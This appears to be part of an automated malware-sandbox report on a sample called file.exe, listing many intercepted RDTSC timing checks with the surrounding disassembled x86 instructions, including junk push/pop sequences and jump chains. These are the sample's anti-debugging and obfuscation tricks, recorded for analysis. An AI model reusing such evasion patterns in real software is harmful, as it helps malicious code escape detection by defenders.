Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E03B6 second address: 52E041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007EFFACBF2F8Dh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 call 00007EFFACBF2F98h 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007EFFACBF2F97h 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007EFFACBF2F90h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E041E second address: 52E0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0424 second address: 52E0454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, 20C4h 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFFACBF2F92h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0454 second address: 52E0508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007EFFAC79DCD4h 0x00000010 mov bh, ch 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007EFFAC79DCD8h 0x0000001c add ecx, 794A3A38h 0x00000022 jmp 00007EFFAC79DCCBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007EFFAC79DCD8h 0x0000002e sub esi, 2D2F3498h 0x00000034 jmp 00007EFFAC79DCCBh 0x00000039 popfd 0x0000003a popad 0x0000003b pushfd 0x0000003c jmp 00007EFFAC79DCD8h 0x00000041 sbb cx, DEF8h 0x00000046 jmp 00007EFFAC79DCCBh 0x0000004b popfd 0x0000004c popad 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0508 second address: 52E050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E050C second address: 52E0527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0527 second address: 52E052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E052D second address: 52E056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007EFFAC79DCD7h 0x00000010 nop 0x00000011 jmp 00007EFFAC79DCD6h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E056C second address: 52E0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0572 second address: 52E0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0577 second address: 52E05D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov bl, ah 0x0000000d pushfd 0x0000000e jmp 00007EFFACBF2F99h 0x00000013 sub al, 00000016h 0x00000016 jmp 00007EFFACBF2F91h 0x0000001b popfd 0x0000001c popad 0x0000001d push dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E05D1 second address: 52E05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E05D5 second address: 52E05DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0628 second address: 52E0677 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFAC79DCD8h 0x00000008 adc ax, C928h 0x0000000d jmp 00007EFFAC79DCCBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 cmp dword ptr [ebp-04h], 00000000h 0x0000001a pushad 0x0000001b mov ebx, esi 0x0000001d jmp 00007EFFAC79DCD0h 0x00000022 popad 0x00000023 mov esi, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0677 second address: 52E067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E067B second address: 52E0681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0052 second address: 52D0056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0056 second address: 52D005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D005A second address: 52D0060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0060 second address: 52D008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov edi, 3E65832Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push FFFFFFFEh 0x0000000f jmp 00007EFFAC79DCD1h 0x00000014 push 307C7249h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D008B second address: 52D008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D008F second address: 52D0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0093 second address: 52D0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0099 second address: 52D0100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFFAC79DCD1h 0x00000009 xor cx, C406h 0x0000000e jmp 00007EFFAC79DCD1h 0x00000013 popfd 0x00000014 mov esi, 2442A3B7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xor dword ptr [esp], 45D6EC01h 0x00000023 jmp 00007EFFAC79DCCAh 0x00000028 call 00007EFFAC79DCC9h 0x0000002d jmp 00007EFFAC79DCD0h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push ecx 0x00000037 pop ebx 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0100 second address: 52D0154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007EFFACBF2F95h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007EFFACBF2F91h 0x0000000f jmp 00007EFFACBF2F8Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007EFFACBF2F94h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0154 second address: 52D015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D015A second address: 52D0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0175 second address: 52D019F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 mov dh, al 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D019F second address: 52D021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1D5Dh 0x00000007 pushfd 0x00000008 jmp 00007EFFACBF2F8Ah 0x0000000d and eax, 54C739B8h 0x00000013 jmp 00007EFFACBF2F8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e mov si, 7A0Bh 0x00000022 mov dx, si 0x00000025 popad 0x00000026 mov eax, dword ptr fs:[00000000h] 0x0000002c pushad 0x0000002d jmp 00007EFFACBF2F98h 0x00000032 pushfd 0x00000033 jmp 00007EFFACBF2F92h 0x00000038 sbb esi, 74A95E78h 0x0000003e jmp 00007EFFACBF2F8Bh 0x00000043 popfd 0x00000044 popad 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D021C second address: 52D0222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0222 second address: 52D0228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0228 second address: 52D022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D022C second address: 52D0230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0230 second address: 52D0253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, 4A84h 0x0000000e jmp 00007EFFAC79DCCDh 0x00000013 popad 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0253 second address: 52D0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0257 second address: 52D026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D026A second address: 52D0282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F94h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0282 second address: 52D02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007EFFAC79DCCBh 0x00000017 jmp 00007EFFAC79DCD3h 0x0000001c popfd 0x0000001d mov ax, 492Fh 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D02BE second address: 52D03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f pushfd 0x00000010 jmp 00007EFFACBF2F8Fh 0x00000015 add ecx, 0978291Eh 0x0000001b jmp 00007EFFACBF2F99h 0x00000020 popfd 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007EFFACBF2F90h 0x00000028 jmp 00007EFFACBF2F95h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007EFFACBF2F97h 0x00000037 sbb cl, FFFFFF8Eh 0x0000003a jmp 00007EFFACBF2F99h 0x0000003f popfd 0x00000040 mov bl, ah 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 jmp 00007EFFACBF2F93h 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007EFFACBF2F94h 0x00000051 adc ch, 00000068h 0x00000054 jmp 00007EFFACBF2F8Bh 0x00000059 popfd 0x0000005a pushfd 0x0000005b jmp 00007EFFACBF2F98h 0x00000060 sub ax, 0FC8h 0x00000065 jmp 00007EFFACBF2F8Bh 0x0000006a popfd 0x0000006b popad 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007EFFACBF2F94h 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03EC second address: 52D03FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03FE second address: 52D0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0402 second address: 52D04C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a jmp 00007EFFAC79DCCDh 0x0000000f call 00007EFFAC79DCD0h 0x00000014 call 00007EFFAC79DCD2h 0x00000019 pop eax 0x0000001a pop edi 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e movzx ecx, bx 0x00000021 mov ecx, edi 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov edi, esi 0x00000028 mov eax, 6592AD73h 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f jmp 00007EFFAC79DCD6h 0x00000034 mov eax, dword ptr [75AB4538h] 0x00000039 jmp 00007EFFAC79DCD0h 0x0000003e xor dword ptr [ebp-08h], eax 0x00000041 pushad 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 call 00007EFFAC79DCCAh 0x0000004a pop esi 0x0000004b popad 0x0000004c pushfd 0x0000004d jmp 00007EFFAC79DCCBh 0x00000052 sbb cx, C8EEh 0x00000057 jmp 00007EFFAC79DCD9h 0x0000005c popfd 0x0000005d popad 0x0000005e xor eax, ebp 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 mov di, 564Eh 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D04C4 second address: 52D0576 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFACBF2F8Fh 0x00000008 xor ah, FFFFFFFEh 0x0000000b jmp 00007EFFACBF2F99h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007EFFACBF2F8Eh 0x0000001a jmp 00007EFFACBF2F95h 0x0000001f popfd 0x00000020 call 00007EFFACBF2F90h 0x00000025 pop esi 0x00000026 popad 0x00000027 popad 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c call 00007EFFACBF2F93h 0x00000031 pop esi 0x00000032 pushfd 0x00000033 jmp 00007EFFACBF2F99h 0x00000038 and ch, FFFFFFA6h 0x0000003b jmp 00007EFFACBF2F91h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0576 second address: 52D0599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, dh 0x00000011 mov eax, 213390DBh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0599 second address: 52D059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D059F second address: 52D0632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 mov dword ptr fs:[00000000h], eax 0x0000001c jmp 00007EFFAC79DCD3h 0x00000021 mov dword ptr [ebp-18h], esp 0x00000024 jmp 00007EFFAC79DCD6h 0x00000029 mov eax, dword ptr fs:[00000018h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov esi, ebx 0x00000034 pushfd 0x00000035 jmp 00007EFFAC79DCD9h 0x0000003a sub si, F586h 0x0000003f jmp 00007EFFAC79DCD1h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0632 second address: 52D0637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0637 second address: 52D06AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 1710h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [eax+00000FDCh] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007EFFAC79DCD5h 0x00000018 sbb eax, 75A09D96h 0x0000001e jmp 00007EFFAC79DCD1h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007EFFAC79DCD0h 0x0000002a jmp 00007EFFAC79DCD5h 0x0000002f popfd 0x00000030 popad 0x00000031 test ecx, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov bx, 4F7Eh 0x0000003a mov bl, E5h 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D06AB second address: 52D06CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007EFFACBF2FC5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFACBF2F90h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D06CD second address: 52D06D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D06D3 second address: 52D06D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C023F second address: 52C0250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0250 second address: 52C026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C026D second address: 52C0282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFFAC79DCCAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0282 second address: 52C02D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3B03h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 2Ch 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push ebp 0x00000015 jmp 00007EFFACBF2F98h 0x0000001a mov dword ptr [esp], ebx 0x0000001d pushad 0x0000001e push edx 0x0000001f mov bl, ah 0x00000021 pop ebx 0x00000022 popad 0x00000023 xchg eax, edi 0x00000024 jmp 00007EFFACBF2F90h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02D0 second address: 52C02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02D4 second address: 52C02F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0427 second address: 52C042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C047F second address: 52C049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C049B second address: 52C049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C049F second address: 52C04A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A3 second address: 52C04A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A9 second address: 52C04D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E297h 0x00000007 push eax 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007EFFACBF2F99h 0x00000012 nop 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, 6D1EB949h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0516 second address: 52C051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C051C second address: 52C0520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0520 second address: 52C053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C053B second address: 52C0541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0541 second address: 52C0575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F001CF3BBFBh 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 popad 0x00000014 js 00007EFFAC79DD16h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007EFFAC79DCCBh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0575 second address: 52C0680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d mov ax, 1873h 0x00000011 mov eax, 2587C8CFh 0x00000016 popad 0x00000017 jne 00007F001D390E81h 0x0000001d jmp 00007EFFACBF2F92h 0x00000022 mov ebx, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 call 00007EFFACBF2F8Eh 0x0000002b pushad 0x0000002c popad 0x0000002d pop ecx 0x0000002e jmp 00007EFFACBF2F91h 0x00000033 popad 0x00000034 lea eax, dword ptr [ebp-2Ch] 0x00000037 pushad 0x00000038 jmp 00007EFFACBF2F8Ch 0x0000003d jmp 00007EFFACBF2F92h 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 mov si, 9C4Dh 0x00000049 pushad 0x0000004a jmp 00007EFFACBF2F98h 0x0000004f pushfd 0x00000050 jmp 00007EFFACBF2F92h 0x00000055 sub eax, 1FC7D1C8h 0x0000005b jmp 00007EFFACBF2F8Bh 0x00000060 popfd 0x00000061 popad 0x00000062 popad 0x00000063 push eax 0x00000064 jmp 00007EFFACBF2F99h 0x00000069 xchg eax, esi 